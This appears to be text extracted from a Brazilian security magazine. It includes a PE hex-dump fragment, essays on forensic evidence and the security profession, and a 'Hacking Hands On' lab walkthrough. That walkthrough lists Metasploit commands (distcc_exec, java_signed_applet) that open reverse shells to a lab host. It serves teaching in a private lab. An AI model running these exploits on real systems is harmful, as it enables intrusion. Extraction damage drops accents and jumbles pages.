20
00
00
00
00
00
00
b8
72
75
00
00
0f
1a
00
00
01
61
6e
00
00
00
00
00
00
4c
6d
64
00
00
ff
00
00
00
cd
20
65
00
00
ff
00
00
01
21
6d
72
00
00
00
00
00
00
90
75
20
00
00
00
00
00
00
90
73
57
00
00
|MZP.............|
|........@.......|
|................|
|................|
|........!..L.!..|
|This program mus|
|t be run under W|
|in32..$7........|
|................|
[1] http://pev.sf.net
[2] https://code.google.com/p/yara-project/
or
FERNANDO MERCS
37
A Teoria de Shylock
38
Escolhas tcnicas
mal direcionadas
e formuladas
esto reificando
os mesmos
problemas de
ineficincia e
lentido do
Poder Judicirio.
informao, de acesso ao judicirio, de petio, de
ampla defesa e contraditrio, dentre outros, so
diariamente atacados por softwares e stios feitos por engenheiros que no vivem diariamente o
Poder Judicirio, o processo judicial e seus atores
(juzes, advogados, cartorrios e cidados).
A suposta celeridade conquistada no se constri
em busca da pacificao social, pois a verdade
dos autos, principalmente nas questes relativas
percia forense em sistemas informatizados, fica
prejudicada e invivel de ser construda materialmente. A verdade formal do processo se sobrepe
verdade material, que a obtida por procedimentos da melhor tcnica conhecida somados ao
respeito aos direitos humanos processuais.
E nesta busca do equilbrio necessrio construo da verdade material dos processos, todos
os atores envolvidos tm falhado continuamente.
Vrios fatores podem ser apontados como smbolos destas falhas: falta de compreenso das tcnicas e tecnologias envolvidas nas construes
de softwares e sistemas de gerenciamento; falta
de treinamento destes atores nas ferramentas e
escolhas tecnolgicas implementadas; a excluso
digital da maioria dos atores envolvidos; falta de
profissionais qualificados para desenvolverem estas interfaces entre o jurdico e tcnico; ausncia
de dilogos consistentes entre os atores envolvidos; falta de parmetros procedimentais tecnolgicos e jurdicos para o desenvolvimento de per-
O sangue no
estava escrito no
contrato como
multa pelo
descumprimento,
somente o
corao
argumentou que, se fosse executado o contrato,
este teria que cumpri-lo risca e dentro dos limites
impostos pela letra que assegurava o seu direito.
Assim decidiu o juiz da causa:
Um momentinho, apenas. H mais alguma coisa.
Pela letra, a sangue jus no tens, nem uma gota.
So palavras expressas: uma libra de carne. Tira,
pois, o combinado: tua libra de carne. Mas se
acaso derramares, no instante de a cortares, uma
gota que seja, s, de sangue cristo, teus bens
e tuas terras todas, pelas leis de Veneza, para o
Estado passaro por direito.
O sangue no estava escrito no contrato como
multa pelo descumprimento, somente o corao.
Assim, a letra da lei, que foi o acordo entre as partes, no poderia ser descumprida com o derramamento de sangue que no estava inscrito nela.
O sangue, simblica e juridicamente, era o excesso da execuo do detentor do direito. E este
excesso deve ser restringido e coibido, como o foi
na pea.
Assim, o caso literrio de Shylock, conceitualmente, aplica-se a todos os casos de percia em
sistemas informatizados, pois, desde o pedido
inicial at o cumprimento do mandado, em toda
a cadeia procedimental que leva at a obteno
da prova, de forma lcita, os envolvidos devero
realizar as prticas que respeitem este binmio:
melhores prticas tcnicas e respeito aos direitos
humanos fundamentais.
Se o corao tecnicamente no pode ser obtido sem o sangue, no h como se implementar
mandado de execuo. A racionalidade inviabi-
39
Todos os mandados deste crime devem obedecer os direitos fundamentais de forma especfica
e clara e determinar que tipos de arquivos a investigao requer, ou seja, arquivos de imagens e
vdeos e quais so os requisitos tcnicos mnimos
para a coleta.
Contudo, no raro, os peritos, sem quaisquer procedimentos traados e acordados, abusam do direito atribudo busca e apreenso e amealham
arquivos nas extenses pdf, word, exe, odt, ODF,
ppt, etc., sem justificar tecnicamente se estavam
capturando imagens e vdeos dentro destes formatos e qual tecnologia estavam aplicando.
Assim, algumas situaes so verificadas: os peritos no determinam as ferramentas que iro utilizar; no bloqueiam a comunicao da entrada
USB; no determinam e divulgam as tcnicas de
espelhamento do HD necessrias para o desenvolvimento da investigao pericial, enfim, uma
srie de situaes que inviabilizam a integridade
jurdica e tcnica da prova.
Diante disto, estas percias extrapolam os limites
tcnicos e acabam por invadir direitos fundamentais dos envolvidos e dos no envolvidos, por no
respeitarem o devido processo legal, a ampla defesa, o contraditrio, alm dos princpios da segurana jurdica e tecnolgica.
VICTOR HUGO
CBacharel em Direito pela Pontifcia Universidade Catlica de So Paulo PUCSP (2004),
em Histria pela Universidade de So Paulo
USP (2005)
Professor da FATEC Carapicuba em Direito
Empresarial (2006-2008) e Segurana Empresarial.
Pesquisador do Grupo de Percia Forense em
Sistemas Informatizados do CnPq.
Vice-Presidente da Comisso de Responsabilidade Social da OAB/SP (2006-2008).
Mestre em Direitos Humanos pela Faculdade
de Direito da Universidade de So Paulo
(USP).
Mestre em Direitos Humanos na Faculdade
de Direito da USP.
40
Segurana da Informao:
42
FONTE CANSTOCKPHOTO.COM
A RESPONSABILIDADE DO PROFISSIONAL
DA SEGURANA DA INFORMAO
Garantir que as informaes estejam em um local adequado, disponveis no momento desejado,
sejam confiveis e que permaneam protegidas
contra fraudes e aquisies inapropriadas, so os
deveres de um profissional especializado em segurana da informao. Vale a pena ressaltar que
no existe risco zero e ento esses especialistas
buscam diminuir os riscos em que as empresas
esto expostas.
Uma das maiores dificuldades deste profissional
assegurar que todos os funcionrios conheam e
sigam corretamente as normas e polticas de segurana estabelecidas pela empresa, e que entendam a sua importncia. Afinal de contas, as pessoas so o elo mais fraco da segurana.
43
INFOGRFICO
44
CONCLUSO
O mercado est aquecido e as oportunidades ainda so pouco exploradas nesta rea, com certeza
a profisso ser uma das mais reconhecidas, importantes e procuradas em alguns anos, porm,
importante ressaltar que necessrio a criao
urgente de mo de obra qualificada e que as empresas iniciem uma mudana cultural valorizando
e buscando cada vez mais contratar profissionais
para proteger suas informaes.
Afinal, melhor prevenir do que remediar.
Fontes
http://www.schneier.com/blog
http://www.tecmundo.com.br
http://pt.wikipedia.org/wiki/Era_da_informao
http://www.publico.pt/tecnologia
http://roneymedice.com.br
http://www.techvoice.org
http://www.gartner.com/technology
http://www.seginfo.com.br
http://idgnow.uol.com.br/ti-corporativa
http://informationweek.itweb.com.br
http://www.administradores.com.br/noticias
SMOLA, M. Gesto da Segurana da Informao,
Uma Viso Executiva. 7 edio. Rio de Janeiro: Elsevier, 2003
FERDINANDO KUN
45
Hacking Hands On
Windows XP
LINUX Metasploitable
Windows 8
Endereo
IP
192.168.0.1
192.168.0.100
192.168.0.5
192.168.0.101
46
exploit
Aps a execuo do exploit existir um sesso aberta onde pode-se digitar o comando pwd e verificar que est dentro do C:\Windows\System32 ,
outro comando pode ser utilizado o sysinfo.
Cenrio 2 LINUX Metasploitable
info unix/misc/distcc_exec
use unix/misc/distcc_exec
show options
set RHOST 192.168.0.5
show payloads
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.0.1
check
exploit
JORDAN BONAGURA
Pesquisador em Segurana da Informao /
CEH
Fundador do Projeto Stay Safe
Organizador da Vale Security Conference
Membro da Comisso de Crimes de Alta Tecnologia da OAB
Professor e Coordenador de Curso em TI
Fundador do SJC Hacker Clube
Aps a execuo do exploit existir um sesso aberta onde pode-se digitar o comando pwd e verificar que est dentro do
/tmp
Cenrio 3 Windows 8
info multi/browser/java_signed_applet
use multi/browser/java_signed_applet
show options
set SRVHOST 192.168.0.101
set LPORT 1111
set uripath /
set PAYLOAD windows/meter
preter/reverse_tcp
set LHOST 192.168.0.1
set port 2222
exploit
Aps a execuo do exploit existir um sesso
aberta onde pode-se digitar o comando pwd e
verificar em qual diretrio est bem, o comando
sysinfo tambm pode ser utilizado.
Agora que voc j conseguiu invadir em seu
laboratrio 3 diferentes sistemas operacionais,
est na hora de melhor se aprofundar e comear
a entender como estes exploits so capazes
de explorar estas vulnerabilidades, bem como
melhor compreender conceitos de redes de computadores e sistemas operacionais, pois somente
estudando voc realmente conseguir obter xito
em suas estratgias de hacking.
47
48
possvel criar
um memorial
virtual onde voc
poder ser
lembrado pela sua
rede de contatos
previamente
selecionados.
individual ou em grupo.
Ento fica a pergunta: pode existir vida online aps
a morte? Tecnicamente no sei dizer, porm me
sobressalta ver um amigo, falecido h cerca de um
ms, ainda online.
Exposio - File SP
FILE Games
O FILE Games 2013 trouxe incrveis games de
estdios independentes, produes de grandes
desenvolvedores e instalaes de vrios pases
unidos no mais importante evento artstico-cultural de arte e tecnologia
da Amrica Latina.
Os games selecionados
so diversos, mas tm
como ponto em comum
sua relao com a arte,
seja ela por meio de
inovaes tecnolgicas,
grficos ou jogabilidade.
FILE Anima+
FILE Anima+ apresentou, em sua 3 edio,
diferentes gneros de
animao, que vo desde curtas e longas-metragens experimentais at filmes de grandes estdios, inclusive animaes interativas.
Destaque FILE Anima+
Anrick Bregman &
Koji Morimoto Attraction (animao
interativa) Frana, Japo & Brasil
Attraction o
primeiro anime interativo do mundo,
criado como parte
de uma campanha
antitabagismo
e
dirigido por Koji
Morimoto e Anrick
Bregman.
Ele conta a histria
de Hiro, Koichi e
Ren, trs adolescentes que vivem em Tquio, no ano de 2050 e
descobrem que crescer no to divertido quanto
parece primeira vista.
50
sign.
Destaques FILE Games
H2HC WORLD
APPS
CHARGE
RedPhone - Ferramenta para criptografia de comunicaes de voz ponta-ponta. Faz uso de internet. Ambas as
partes possuindo o RedPhone, o mesmo
garante a criptografia dos dados. Opensource gratuita. Disponivel para Android e Iphone.
Pocket - Servio de leia mais tarde
timo no desktop, mas ele realmente
excelente nos dispositivos mveis. Salve
artigos que voc encontra por a e tenha
acesso a eles no celular para ler quando
estiver entediado. Disponvel para Iphone.
LIVROS
52
53
Horscopo
ries
Libra
Touro
Escorpio
Gmeos
Sagitrio
Pluto, Saturno e Vnus em timos aspectos entre si vo atualizar o seu sistema operacional. Caso esteja passando por
um problema de sade, troque
de servidor que tudo dar certo.
Cncer
Leo
Virgem
54
Capricrnio
Aqurio
Peixes
INSPIRANDO CONFIANA
www.underprotection.com.br